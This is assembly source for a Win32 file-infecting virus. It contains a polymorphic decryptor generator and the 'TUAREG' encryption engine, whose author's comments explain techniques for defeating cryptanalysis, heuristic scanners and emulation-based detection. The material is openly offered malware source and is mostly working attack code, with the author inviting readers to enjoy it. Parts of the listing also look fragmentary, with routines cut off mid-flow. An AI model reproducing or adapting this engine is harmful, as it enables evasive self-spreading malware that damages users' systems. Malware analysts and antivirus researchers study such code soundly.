HandleIMAGEHLP dd 0
ASC_CheckSumMappedFile db 'CheckSumMappedFile',0
RVA_CheckSumMappedFile dd 0
;;; This function creates a decryptor that fills the 40 free bytes at the be-
;;; ginning of the virus. That (shitty polymorphic) decryptor is made to avoid
;;; cryptanalisis. Moreover, this function gets some values for the later use
;;; of the TUAREG.
ModifyDumbDecryptor proc
pushad
@@AgainRnd: call Random
or eax, eax
jz @@AgainRnd
mov [ebp+DecryptKey], eax ; Get the decryption key for the
; main encryption (TUAREG)
@@AgainRnd2: call Random
and al, 3
jz @@AgainRnd2
dec al
mov byte ptr [ebp+EncryptType], al ; Get method: 0=ADD,
; 1=SUB, 2=XOR
lea edi, [ebp+Inic_Virus]
;; Let's use the TUAREG functions
mov dword ptr [ebp+Index1Register], 08080808h
call SelectARegister
mov [ebp+Index1Register], al
call SelectARegister
mov [ebp+Index2Register], al
call SelectARegister
mov [ebp+KeyRegister], al
lea ebx, [ebp+@@SetIndex]
lea ecx, [ebp+@@SetCounter]
lea edx, [ebp+@@SetKey]
lea esi, [ebp+@@Garbage]
call RandomCalling
mov esi, edi
@@GetOtherType:
call Random
and eax, 3
jz @@GetOtherType
dec eax
mov [ebp+EncryptType2], al
cmp al, 1
jb @@PutSUB
jz @@PutADD
@@PutXOR: mov al, 0031h
jmp @@Next01
@@PutADD: mov al, 0001h
jmp @@Next01
@@PutSUB: mov al, 0029h
@@Next01: mov ah, [ebp+KeyRegister]
shl ah, 3
or ah, [ebp+Index1Register]
cmp byte ptr [ebp+Index1Register], 5
jnz @@Next02
or ah, 40h
stosw
xor al, al
stosb
jmp @@Next03
@@Next02: stosw
@@Next03: call @@Garbage
push esi
lea ebx, [ebp+@@ModifyKey]
lea ecx, [ebp+@@ModifyIndex]
lea edx, [ebp+@@Garbage]
lea esi, [ebp+@@Ret]
call RandomCalling
pop esi
@@Garbage2: pushad
call Random
and al, 3
jz @@OneByteWithoutRegister
cmp al, 2
jb @@OneByteWithRegister
jz @@TwoBytes2
@@Garbage_XCHGEAX:
call Random
and al, 7
cmp al, 4
jz @@Garbage_XCHGEAX
add al, 90h
stosb
jmp @@EndGarbage
@@Garbage: pushad
call Random
and al, 3
jz @@TwoBytes
cmp al, 2
jb @@OneByteWithoutRegister
jz @@EndGarbage
@@OneByteWithRegister:
call Random
and al, 8
mov dl, al
call SelectARegister
or al, dl
add al, 40h
stosb
jmp @@EndGarbage
@@OneByteWithoutRegister:
call Random
and eax, 07h
mov al, byte ptr [ebp+eax+@@OneByteTable]
stosb
jmp @@EndGarbage
@@TwoBytes2:
test edi, 1
jnz @@EndGarbage
@@TwoBytes:
call SelectARegister
mov dl, al
call Random
and ax, 0738h
mov dh, ah
inc eax
call RandomFlags
jz @@TwoBytes_01
xchg dh, dl
add al, 2
@@TwoBytes_01:
shl dh, 3
mov ah, 0C0h
or ah, dl
or ah, dh
stosw
@@EndGarbage:
mov [esp+S_EDI], edi
popad
ret
ModifyDumbDecryptor endp
KeyModification db 0
KeyModifier dd 0
EncryptType2 db 0
;; This routine copies dword by dword the indicated frame, and before storing
;; it, it encrypts that dword with the encryption key. There is one control
;; variable (CopyingVirus) that controls whether he have to leave the first
;; 3Ch bytes unencrypted (the little decryptor) and we have to encrypt with
;; two encryption keys instead of one. Cryptanalisys is hard with two decryp-
;; tion keys because the relation from one byte to another doesn't remain
;; constant when you apply XOR+XOR or ADD+XOR or SUB+XOR, as I apply in this
;; virus. If this doesn't avoid anything, maybe next time I'll code two 8 Kb
;; sized decryptors with the TUAREG and with more techniques of encryption (or
;; two encryptions, or position-based decryptions, or things like that :).
EncryptWhileStoring proc
push edx
cmp byte ptr [ebp+CopyingVirus], 1 ; Virus code?
jnz @@Jump_000 ; If not, jump
mov edx, 3Ch/4 ; Leave the first 3Ch bytes with only
; an encryption layer
jmp @@Loop_001
@@Jump_000: xor edx, edx ; EDX=0
@@Loop_001: lodsd
cmp byte ptr [ebp+CopyingVirus], 1
jnz @@Next2
or edx, edx ; While EDX isn't 0, we only encrypt with
jz @@Next1 ; the main encryption key
dec edx
jmp @@Next2
@@Next1: cmp byte ptr [ebp+EncryptType2], 1
jb @@ADD2
jz @@SUB2
@@XOR2: xor eax, dword ptr [ebp+CryptValue2]
jmp @@Next3
@@ADD2: add eax, dword ptr [ebp+CryptValue2]
jmp @@Next3
@@SUB2: sub eax, dword ptr [ebp+CryptValue2]
@@Next3: push eax
mov eax, [ebp+CryptValue2]
cmp byte ptr [ebp+KeyModification], 1
jb @@ModADD
jz @@ModSUB
cmp byte ptr [ebp+KeyModification], 3
jb @@ModXOR
@@ModROL: rol eax, 1
jmp @@Next4
@@ModADD: add eax, [ebp+KeyModifier]
jmp @@Next4
@@ModSUB: sub eax, [ebp+KeyModifier]
jmp @@Next4
@@ModXOR: xor eax, [ebp+KeyModifier]
@@Next4: mov [ebp+CryptValue2], eax
pop eax
@@Next2: cmp byte ptr [ebp+EncryptType], 1
jb @@ADD
jz @@SUB
@@XOR: xor eax, dword ptr [ebp+DecryptKey]
jmp @@Next
@@ADD: add eax, dword ptr [ebp+DecryptKey]
jmp @@Next
@@SUB: sub eax, dword ptr [ebp+DecryptKey]
@@Next: stosd
dec ecx
jnz @@Loop_001 ; Repeat <ECX> times (I don't use LOOP coz
pop edx ; the jump exceeds 128 bytes :)
ret
EncryptWhileStoring endp
CopyingVirus db 0
CalculateAPIsAddresses proc
;; ESI=Address of PE header
pushad
lea edi, [ebp+APIInfo+4]
mov ecx, 20h
xor eax, eax
@@LoopKK: mov [edi], eax
add edi, 10h
loop @@LoopKK
Idata_Phys dd 0
Idata_Virt dd 0
;ËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËË;
;ÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;----------------------------------------------------------------------------;
;ßßßßÛßß Û ÛßßÛ ÛßÛÜ Ûßßß ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ ÜÛ ÜßÜ ÜÛ ;
;ßßÛ Û Û Û Û Û Û ÜÛ Û Û Tameless Unpredictable Û ÞßÞ Ý Þ ÞßÞ ;
; Û Û Û Û ÛßßÛ ÛßÛÜ Ûßß Û ßÛ Anarchic Relentless Û Þ Þ þ Ý Þ ;
; Û Û ÛÜÜÛ Û Û Û Û ÛÜÜÜ ÛÜÜÛ Encryption Generator ÛÜÜÜÜÜ Þ ÜÜ Ý Þ Ü Þ ;
; ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÛÜ Ü ßÜß ÜÜÛÜ;
;----------------------------------------------------------------------------;
; The name is quite strambotic :), but I had to justify why the engine is ;
; called "TUAREG". Anyway, the name isn't new, as I'm in this project since ;
; 1998, yet before making the MeDriPolEn. ;
; ;
; This engine features: ;
; ;
; PRIDE - Pseudo-Random Index DEcryption ;
; Branching Technique - Avoids linear execution of the decryption loop ;
; ;
; This two techniques are explained on the article about "Advanced decryption;
; construction" on 29A#5, where they are better explained than they would be ;
; here. ;
; ;
; Some notes: ;
; - The subroutines code will be at the end of every branch for every subrou-;
; tine created in that branch (the engine selects randomly whether call a ;
; created existing one or create a new one and call it when inserting code).;
; - The registers have a "touched" flag, which avoids their use before set- ;
; ting on them a valid value (thing that sets lots of flags on heuristic ;
; scanners). So, when you call SelectARegisterWithInit, it'll look if the ;
; register is "touched". If it isn't, before returning it'll made a DoMOV ;
; with a random value and it'll set as "touched". ;
; - This version is 1.0 after adding calls to the Win32 API (concretely to ;
; KERNEL32) but not directly, but to the import table (like a normal app.). ;
; - "Recursivity" is the main word in the making of this engine. Almost ;
; every routine is prepared to be called in recursive instances, and with ;
; recursivity we make that the generated code become complex as hell. Just ;
; look at the code :). ;
; - The engine is HUGE (more than a half of the virus is this engine), and, ;
; corresponding to its size, the decryptor it generates is one of the most ;
; complex decryptors ever generated by any existent polymorphic engine. I'm ;
; not saying it's the best, but sure it's one of the best :). ;
; - Nothing more, enjoy it as much as I did it coding it! ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; EAX=Displacement from the beginning till the virus
; EBX=Virtual address of the beginning of the encrypted part
; ECX=Place where the decryptors must be put
; Size of encrypted part is Virus_Size+Host_Data_Size
TuaregFlags dd 0
BranchIdentifier db 0
AddressOfTuaregStackFrame dd 0
EPAddition dd 0
;; This flags are individual for each branch, so they aren't general. This
;; allows each branch to have a "unique" behaviour sometimes.
;;
;; Flags:
;; Bit 0: Use key register: 0=YES, 1=NO
;; Bit 1-2: 00=Use buffer register, 01=XOR again Index2, 10=PUSH/POP Index2
;; 11=Reserved, repeat flag obtention
;; Bit 3: 0=No action, 1=Exchange Index1 and Index2 when using one of them
;; as memory index (avoid one possible algorithmical clue for detection)
;; Bit 4-5: 00=Functional branch code in a subroutine
;; Bit 6-7: 00=Index calculation + decryption in a subroutine
;; Bit 8-9: 00=Decryption in a subroutine
;; Bit 10-11: 00=All index modifications in a subroutine
;; Bit 12-13: 00=Modify index1 in a subroutine
;; Bit 14-15: 00=Mask index1 in a subroutine
;; Bit 16-17: 00=Modify index2 in a subroutine
;; Bit 18-19: 00=Mask index2 in a subroutine
;; Bit 20-31: Reserved for future expansion
call Random
and eax, Virus_SizePOW2 - 8
mov [ebp+Index1Modifier], eax ; Set Index1 modifier
call Random
and eax, 3
add eax, 4
mov [ebp+Index2Modifier], eax ; Set Index2 modifier
; Register selection
mov dword ptr [ebp+Index1Register], 08080808h
@@OtherRegister:
call SelectARegister
cmp byte ptr [ebp+AnyAPIFound], 1
jnz @@SelectAllForKey
cmp al, 2
jbe @@OtherRegister
@@SelectAllForKey:
mov [ebp+KeyRegister], al
call SelectARegister
mov [ebp+Index1Register], al
call SelectARegister
mov [ebp+Index2Register], al
call SelectARegister
mov [ebp+BufferRegister], al
mov eax, dword ptr [ebp+Index1Register]
mov dword ptr [ebp+CopyOfUsedRegisters], eax ; Save a copy
call Random
and eax, 7Ch
add eax, [ebp+BssSection]
mov [ebp+ReservedBssAddress], eax ; Save a .bss address
jmp @@NextThing
@@NoBssSection:
mov eax, [ebp+EncryptedDataBeginAddress]
add eax, offset SystemTime - offset Inic_Virus
mov [ebp+BssSection], eax
call Random
and eax, 7Ch
add eax, [ebp+BssSection]
mov [ebp+ReservedBssAddress], eax ; Get it from another
; place
@@NextThing:
mov eax, [ebp+EncryptedDataBeginAddress]
push eax
push eax
push eax
add eax, offset SystemTime - offset Inic_Virus
mov [ebp+Data1Section], eax
pop eax
add eax, offset Directory1 - offset Inic_Virus
mov [ebp+Data2Section], eax
pop eax
add eax, offset ArrayOfCalls1 - offset Inic_Virus
mov [ebp+Data3Section], eax
pop eax
add eax, offset CallsLevel1 - offset Inic_Virus
mov [ebp+Data4Section], eax ; Set some free frames for
; memory reads/writes. Later,
; the function SelectAnAddress will
; give an address from one of this
; frames to read or write freely.
mov ecx, 30h
@@LoopFillMemVars2:
mov dword ptr [ebp+4*ecx+ReservedMemVars_Addr-4], 0
mov byte ptr [ebp+ecx+ReservedMemVars_F-1], 0
loop @@LoopFillMemVars2
call Random
and eax, Virus_SizePOW2 - 4
mov [ebp+InitialValue], eax ; Set initial value of the
; Index2
@@InsertFunctionalCode:
movzx eax, byte ptr [ebp+BranchIdentifier]
shl eax, 6 ; *40h
add eax, dword ptr [ebp+AddressOfTuaregStackFrame]
mov [ebp+TuaregFlags], eax
@@IFC_Next_02:
;; Now we have to modify Index1 and Index2. Since we can code it interleaved
;; (each modification is composed of two main instructions) the less difficult
;; way to code that is making this. The modification of Index1 is adding a
;; random multiple-of-8 value. The modification of Index2 is adding a random
;; value between 4 and 7. The masking of Index1 is making the instruction
;; AND Index1,Virus_SizePOW2-4, and so is the masking of Index2.
;; Little maths: Since Index1 and Index2 are a random number between 0 and
;; Virus_SizePOW2, when we add a number to them less than Virus_SizePOW2 (as
;; it's the case), the resulting number never will be more than the double of
;; Virus_SizePOW2, so the immediate bit above the highest bit set on
;; Virus_SizePOW2-4 (in this case, due to the fact that Virus_SizePOW2-4 is
;; 7FFCh) is the bit 15. So, if we put in a dword Virus_SizePOW2 - 4 (7FFCh)
;; and we left the bit 15 cleared, we can have the rest of bits (16 to 31) set
;; to a random state, due to the fact that in Index1 and Index2 are going to
;; be always 0. This is a manner of making a confusion of this instruction
;; with the garbage ones, since it's a working mask, but it's random in a
;; great part of the whole dword.
;; So, we select a combination. Between the modification and the masking we
;; insert lots of garbage (as always).
call Random
and eax, 7
jz @@Combination0
cmp al, 2
jb @@Combination1
jz @@Combination2
cmp al, 4
jb @@Combination3
jz @@Combination4
cmp al, 6
jae @@IFC_Next_02 ; Select up to 6 combinations
@@Combination5: call ModifyIndex2 ; comb 5: Modify Index2, Modify Index1,
call ModifyIndex1 ; Mask Index1, Mask Index2
jmp @@SubComb1
@@Combination0: call ModifyIndex1 ; comb 0: Modify Index1, Modify Index2,
call ModifyIndex2 ; Mask Index1, Mask Index2
@@SubComb1: call MaskIndex1
call MaskIndex2
jmp @@IFC_Next_03
@@Combination1: call ModifyIndex1 ; Comb 1: Modify Index1, Mask Index1,
call MaskIndex1 ; Modify Index2, Mask Index2
call ModifyIndex2
call MaskIndex2
jmp @@IFC_Next_03
@@Combination2: call ModifyIndex1 ; Comb 2: Modify Index1, Modify Index2,
call ModifyIndex2 ; Mask Index2, Mask Index1
jmp @@SubComb2
@@Combination3: call ModifyIndex2 ; Comb 3: Modify Index2, Mask Index2,
call MaskIndex2 ; Modify Index1, Mask Index1
call ModifyIndex1
call MaskIndex1
jmp @@IFC_Next_03
@@Combination4: call ModifyIndex2 ; Comb 4: Modify Index2, Modify Index1,
call ModifyIndex1 ; Mask Index2, Mask Index1
@@SubComb2: call MaskIndex2
call MaskIndex1
;; When we arrive here, the code to decrypt is already coded. Now we have to
;; test if we decrypted all the virus body or we have to continue decrypting.
@@IFC_Next_03:
call DoCMP ; Do a CMP Index2,InitialValue (or similar)
call RandomFlags ; JNZ to loop or JZ/JMP?
jz @@MakeJZ ; Jump to use JZ
; We make: JNZ Loop
mov ax, 850Fh ; Insert a JNZ.
stosw ; Store the opcode of JNZ
@@CompleteJZ_JNZ:
mov eax, [ebp+JumpsToCompleteNdx]
mov [ebp+eax+JumpsToComplete], edi ; Insert the jump
add edi, 4 ; address and increase
add eax, 4 ; the index
mov [ebp+JumpsToCompleteNdx], eax
call DoRandomGarbage
call DoRandomGarbage ; Make garbage
call DoFinalJMP ; Make the jump to the decrypted part
jmp @@ContinueWithFunctionalCode
; We make: JZ Etiq1 / Garbage / JMP Loop / Etiq1: xxx
@@MakeJZ: mov al, 74h ; Store the opcode of JZ (short)
stosb
inc edi ; Make size for displacement
@@MakeJZ_000:
push dword ptr [ebp+CallsLevel1Ndx] ; Save CALLs indexes
push dword ptr [ebp+CallsLevel2Ndx] ; just in case we have
push dword ptr [ebp+CallsLevel3Ndx] ; to repeat the garbage
; making
jmp @@MakeJZ_001 ; Jump to continue
@@MakeJZ_003:
sub edi, 5 ; Eliminate the size of the "JMP Loop"
@@MakeJZ_001:
mov esi, edi ; Save current insertion address
call DoRandomGarbage ; Make garbage
add edi, 5 ; Add jump size
sub esi, edi ; Get the size of displacement for JZ
neg esi
cmp esi, 5 ; Displacement = size of JMP?
jbe@@MakeJZ_003 ; If it is, repeat (no garbage made)
cmp esi, 7Fh ; under the maximum displacement?
jbe@@MakeJZ_OK ; If it's below or equal, jump
pop dword ptr [ebp+CallsLevel3Ndx] ; We have to repeat the
pop dword ptr [ebp+CallsLevel2Ndx] ; garbage (too many),
pop dword ptr [ebp+CallsLevel1Ndx] ; so we restore the in-
; dexes of the calls to eliminate any
; posible call made during this garbage
; creation
sub edi, esi ; Restore EDI
jmp @@MakeJZ_000 ; Jump and loop
@@MakeJZ_OK: pop eax ; Eliminate the saved call indexes, since
pop eax ; the garbage is made correctly
pop eax
mov eax, esi ; Get the displacement in EAX
neg esi ; Get the index adding in ESI
mov byte ptr [edi+esi-1], al ; Complete the JZ
sub edi, 5 ; Make the JMP
mov al, 0E9h ; Opcode of JMP
stosb ; Store the opcode
jmp @@CompleteJZ_JNZ ; Jump to save the address for later
; completion
;; Since the function Branching is recursive, after this code will be other
;; branches and "functional code". This means that if we put in this point the
;; subroutines that we want to create, they'll be between code, not at the
;; beginning or at the end of the decryptor, technique that increases the
;; polymorphysm of the engine alot.
@@ContinueWithFunctionalCode:
xor ecx, ecx
call CompleteCalls ; Complete calls of level 1
mov ecx, 84h
call CompleteCalls ; Complete calls of level 2
mov ecx, 84h*2
call CompleteCalls ; Complete calls of level 3
@@Completed:
mov dword ptr [ebp+CallsLevel1Ndx], 0 ; Release must-be-
mov dword ptr [ebp+CallsLevel2Ndx], 0 ; created calls
mov dword ptr [ebp+CallsLevel3Ndx], 0
;; This function completes the CALLs pointed by the addresses in the arrays
;; above. Depending on the level of recursivity, we stored the address of that
;; CALL instruction in one of the levels. When we call to this function, de-
;; pending on the value in ECX, we complete them pointing to a created subrou-
;; tine (stored in ArrayOfCallsX) or we create a new subroutine and store the
;; address to that new one into ArrayOfCallsX.
;; ECX=0 for Calls level 1, ECX=84h for Calls level 2, ECX=84h*2 for level 3
CompleteCalls proc
mov edx, [ebp+ecx+CallsLevel1Ndx]
shr edx, 2 ; Get the number of calls to complete
push ecx
and cl, 0Fh
shr cl, 2
inc ecx
mov byte ptr [ebp+GarbageRecursivity], cl ;Set the garbage
; recursivity (calls of level
; 3 can't do any CALL, to
; avoid too much recursivity)
pop ecx
@@CompleteCalls:
dec edx ; Have we completed all the calls?
js @@Completed ; If yes, we end
cmp dword ptr [ebp+ecx+ArrayOfCalls1Ndx], 0 ; Are there
; any created subroutine?
jz @@CreateCall ; If not, create a new one directly
call RandomFlags ; Get random flags
jz @@CreateCall ; Create a call with a 50% of probability
@@AnotherRandom:
call Random
and eax, 3Ch
cmp eax, [ebp+ecx+ArrayOfCalls1Ndx]
jae @@AnotherRandom ; Get a random address from the list
; of created subroutines
add ebp, ecx
mov esi, [4*edx+ebp+CallsLevel1]
lea ebx, [esi+4]
sub ebx, [ebp+eax+ArrayOfCalls1]
neg ebx ; EBX=Displacement from the created subrou-
; tine to the CALL instruction
mov [esi], ebx ; Complete CALL
sub ebp, ecx ; Restore delta offset
jmp @@CompleteCalls ; Loop
@@CreateCall:
cmp dword ptr [ebp+ecx+ArrayOfCalls1Ndx], 80h ; If there are
jz @@AnotherRandom ; too much created subroutines, jump
; to use any created one
add ebp, ecx
mov esi, [4*edx+ebp+CallsLevel1] ; Get the address to the
lea ebx, [esi+4] ; CALL to complete
sub ebx, edi
neg ebx
mov [esi], ebx
sub ebp, ecx
call CreateCALL
CreateCALL proc
add ebp, ecx ; Fix delta offset (we can't put three
; registers inside the brackets :P)
mov ebx, [ebp+ArrayOfCalls1Ndx]
mov [ebp+ebx+ArrayOfCalls1], edi ; Now, set the address of
add ebx, 4 ; storage (EDI) into the array
mov [ebp+ArrayOfCalls1Ndx], ebx ; of created subroutines
sub ebp, ecx ; Restore delta offset
@@AgainCalls: call RandomFlags
jz @@NormalCall
js @@NormalCall ; Simulate a stack frame with a 25% of
; probability
cmp byte ptr [ebp+KeyRegister], 5
jz @@NormalCall
mov byte ptr [ebp+DoNormalCall], 0
mov al, 55h ; Insert PUSH EBP/MOV EBP,ESP
stosb
mov ax, 0EC8Bh
stosw
jmp @@NotNormalCall
@@NormalCall:
mov byte ptr [ebp+DoNormalCall], 1
@@NotNormalCall:
mov esi, edi ; ESI=Address of storage
; cmp byte ptr [ebp+GarbageRecursivity], 2
; jnz @@SetNormalGarbage
; mov byte ptr [ebp+SpecialGarbage], 1
; jmp @@ContinueWithCALLContents
@@SetNormalGarbage:
mov byte ptr [ebp+SpecialGarbage], 0
@@ContinueWithCALLContents:
call DoRandomGarbage ; Make a lot of garbage inside the
call DoRandomGarbage ; subroutine (included CALLs to other
call DoRandomGarbage ; subroutines, depending on the re-
call DoRandomGarbage ; cursivity level)
mov byte ptr [ebp+SpecialGarbage], 0
cmp esi, edi ; Test if EDI has grown (void subrou-
; tine)
jz @@NotNormalCall ;If it's void, repeat garbage generation
cmp byte ptr [ebp+DoNormalCall], 1
jz @@EndCall ; If there is a stack frame simulation...
mov al, 5Dh ; ...store POP EBP
stosb
@@EndCall: mov al, 0C3h
stosb ; Store RET
ret
CreateCALL endp
PreCreateCALLs proc
xor ecx, ecx
mov eax, 10h
mov byte ptr [ebp+GarbageRecursivity], 1
@@MakeAnother:
push eax
call RandomFlags
jz @@DontMake
call CreateCALL
@@DontMake: pop eax
dec eax
jnz @@MakeAnother
mov byte ptr [ebp+GarbageRecursivity], 0
ret
PreCreateCALLs endp
;; This address selects any register which isn't ESP. If the selected register
;; hasn't the "touched" flag actived, the register is initialized with DoMOV
;; using a random value. Moreover, the function (as SelectARegister and
;; SelectARegisterWithInit) saves the last register returned, so the next call
;; to this functions won't return the same register as the time before.
SelectAnyRegisterWithInit proc
@@Other: call Random
and al, 7
cmp al, 4
jz @@Other
cmp al, byte ptr [ebp+RegisterSelectedB4]
jz @@Other ; Select a random between 0 and 7 with isn't
; ESP nor the last selected register
SelectReg_Common:
and eax, 0FFh
cmp byte ptr [ebp+eax+TouchedRegisters], 1
jz @@OK ; If the register is "touched", jump
cmp byte ptr [ebp+KeyRegister], al
jz @@Other
push edx
push eax
mov dl, al
call Random
call DoMOV ; Initialize the register with a random value
pop eax
pop edx
mov byte ptr [ebp+eax+TouchedRegisters], 1 ; Set the reg.
; as "touched"
@@OK: mov byte ptr [ebp+RegisterSelectedB4], al ; Save it as the
; "selecter before"
ret ; Return
SelectAnyRegisterWithInit endp
;; This function makes the instructions to mask the Index1 with AND
MaskIndex1 proc
mov ecx, Virus_SizePOW2
call Random
and eax, 3
inc eax
sub ecx, eax
call Random
and eax, NOT(Virus_SizePOW2 - 1)
and eax, NOT(Virus_SizePOW2)
or ecx, eax ; ECX=The pure mask with random bits
; where in the register to mask will be
; always 0
mov dl, [ebp+Index1Register]
MaskNdxReg: or dl, dl
jz @@EAX
mov ax, 0E081h ; AND Reg,Value
or ah, dl
stosw ; Store the opcode
jmp @@InsertValue
@@EAX: mov al, 25h ; AND EAX,Value
stosb ; Store the opcode
@@InsertValue: xchg ecx, eax
stosd ; Store the masking value
call DoRandomGarbage ; Make garbage
call DoRandomGarbage
ret ; Return
MaskIndex1 endp
;; This function makes the instructions to mask the Index2 with AND
MaskIndex2 proc
mov ecx, Virus_SizePOW2 - 4
call Random
and eax, NOT(Virus_SizePOW2 - 1)
and eax, NOT(Virus_SizePOW2)
or ecx, eax
mov dl, [ebp+Index2Register] ; ECX=Mask with random bits
; where in the register to
; mask will be 0
jmp MaskNdxReg ; Jump to the common part
MaskIndex2 endp
;; This function is common when doing the "functional" code in the branch.
;; What it does is to XOR the Index2 with the Index1, do garbage, make the
;; code to decrypt and do more garbage.
Patch1 proc
mov dh, [ebp+Index1Register]
mov dl, [ebp+Index2Register]
call DoXORRegReg
call DoRandomGarbage
call DoRandomGarbage
call InsertDecryption
call DoRandomGarbage
call DoRandomGarbage
ret
Patch1 endp
;; This function construct code for the decryption operation. It can make a
;; wide variety of methods, using one or two registers inside the brackets,
;; and using a direct value or a register to decrypt. The decryption is XOR,
;; ADD or SUB. No in vane, it's one of the largest functions in this engine.
InsertDecryption proc
test byte ptr [ebp+TuaregFlags], 1 ; Use register for key?
jz @@WithKeyReg ; Then jump to there
;; Here to put directly the decryption address added to the index register
@@Next_02: mov dl, [ebp+KeyRegister]
shl dl, 3
or ah, dl ; Bind the registers to the opcode
or ah, dh
stosw ; Store the opcode
mov eax, [ebp+EncryptedDataBeginAddress] ; Get the addr.
@@IFC_Next_01:
stosd ; Store it
call DoRandomGarbage ; Make garbage
call DoRandomGarbage
ret ; Return
InsertDecryption endp
;; Final jump to the decrypted part. With also a wide variety of methods, with
;; this there isn't a direct jump to the decrypted part, so the decryptor has
;; to be emulated completely to know where the decryptor jumps after the work
;; is done. Hahahahahahahaha! (devilish laugh :)
DoFinalJMP proc
;; Ways of jumping to the decrypted part:
; Common entry:
; MOV [Address], Value (in many and variated types)
; (optional) XOR/ADD/SUB [Address], Value
;; Jump:
; JMP [Address]
; PUSH [Address] / RET
; MOV Reg,[Address] / JMP Reg
; MOV Reg,Address / JMP [Reg]
;; In the common entry, the value and or the memory address can be in regis-
;; ters (the value is moved to a random register before using that value).
;; PUSH [Memory_Address]/RET
@@PUSH__RET: call DoPUSHMem
call DoRandomGarbage
call DoRandomGarbage
mov al, 0C3h ; AL=opcode of RET
stosb ; Store it
jmp @@Return ; Return
;; JMP [Memory_Address]
@@JMP__: call RandomFlags
jz @@JMP__Direct
call Random
sub ebx, eax
call DoMOV
call DoRandomGarbage
call DoRandomGarbage
mov ax, 0A0FFh
or ah, dl
jmp @@Store_01
@@JMP__Direct:
mov ax, 25FFh ; AX=opcode of JMP [Memory_Address]
@@Store_01: stosw ; Store it
mov eax, ebx
stosd ; Complete the opcode with the memory address
; jmp @@Return
;; This function selects two registers from Index1, Index2 or Counter, and
;; sets them on Index1. The key register remains unchanged, since it's needed
;; for the indexed memory accesses, due to the fact that its value never
;; changes.
SelectOnlyTwoRegs proc
push eax
push edx
@@OtherRandom:
call Random ; Get a random value from 0 to 3
and eax, 03h
cmp al, 2 ; Key register?
jz @@OtherRandom ; If so, then get another random
mov al, byte ptr [ebp+eax+CopyOfUsedRegisters] ; Get the
; register in DL
or eax, 08080800h ;Set the other three as 08 (unreserved)
mov dword ptr [ebp+Index1Register], eax ; Set them as the
; new registers
mov al, byte ptr [ebp+CopyOfUsedRegisters+2] ; Restore the
mov byte ptr [ebp+KeyRegister], al ; key register.
; This must be for the indexed memory writes
pop edx
pop eax
ret ; Return
SelectOnlyTwoRegs endp
;; This very used function performs a move operation with the register in
;; DL and the value in EAX. It can do a MOV Reg,Value, a LEA Reg,[Value] or
;; a PUSH Value/Garbage/POP Reg. Sometimes it doesn't give the correct value
;; just at the beginning, so the function adjusts the value with a sucession
;; of XORs, ADDs or SUBs to get the correct value.
DoMOV proc
pushad ; Save registers
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@NoRecursives
@@RepeatRandom:
push eax
call Random
mov ebx, eax
pop eax
and bl, 7
jz @@MOVDirect
cmp bl, 2
jb @@LEA
jz @@LEA2
cmp bl, 4
jb @@PUSHPOP
jz @@MOVMEM
cmp bl, 5
ja @@RepeatRandom
@@Adj_Next01:
call DoRandomGarbage
pop dword ptr [ebp+@@AdjustTimes]
dec byte ptr [ebp+@@AdjustTimes]
jnz @@Adj_Loop01
@@AdjustTimes db 0
db 3 dup (0) ; Padding
@@MOVDirect:
xchg ebx, eax
mov al, 0B8h
add al, dl
stosb
xchg eax, ebx
stosd
jmp @@End
@@LEA: xchg ebx, eax
mov ax, 058Dh
shl dl, 3
or ah, dl
shr dl, 3
stosw
xchg ebx, eax
stosd
jmp @@End
@@LEA2: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@LEA
xchg ebx, eax
mov ax, 008Dh
shl dl, 3
or ah, dl
shr dl, 3
or ah, [ebp+KeyRegister]
sub ebx, [ebp+DecryptKey]
cmp ebx, 7Fh
jbe @@LEA2_b
cmp ebx, 0FFFFFF80h
jbe @@LEA2_d
@@LEA2_b:
or ah, 40h
stosw
xchg ebx, eax
stosb
jmp @@End
@@LEA2_d:
or ah, 80h
stosw
xchg ebx, eax
stosd
jmp @@End
@@NoRecursives2:
mov eax, ebx
@@NoRecursives:
push eax
call Random
mov ebx, eax
pop eax
and bl, 3
jz @@NoRecursives
cmp bl, 2
jb @@MOVDirect
jz @@LEA
jmp @@LEA2
DoPUSHValue proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@DirectPUSH
call RandomFlags
jz @@DirectPUSH
@@Other: call GetAndReserveVar
or ebx, ebx
jz @@DirectPUSH
call DoMOVMemValue
call DoRandomGarbage
call DoPUSHMem
call ReleaseVar
jmp @@End
@@DirectPUSH:
push eax
cmp eax, 7Fh
jbe @@PUSHByte
cmp eax, 0FFFFFF80h
jae @@PUSHByte
mov al, 68h
stosb
pop eax
stosd
jmp @@End
@@PUSHByte:
mov al, 6Ah
stosb
pop eax
stosb
cmp eax, 1
jz @@SelectINC
cmp eax, -1
jz @@SelectDEC
@@Others:
cmp byte ptr [ebp+FlagNoLEA], 1
jz @@NoLEAs
@@OtherRandom:
push eax
call Random
mov ebx, eax
pop eax
and bl, 7
jz @@ADDDirect
cmp bl, 2
jb @@SUBDirect
jz @@LEA
cmp bl, 4
jb @@LEA2
jz @@MOVMEM
cmp bl, 5
ja @@OtherRandom
@@MOVMEM2: call GetAndReserveVar
or ebx, ebx
jz @@NoRecursives
call DoMOVMemValue
call DoRandomGarbage
call DoADDRegMem
call ReleaseVar
jmp @@End
@@MOVMEM: call GetAndReserveVar
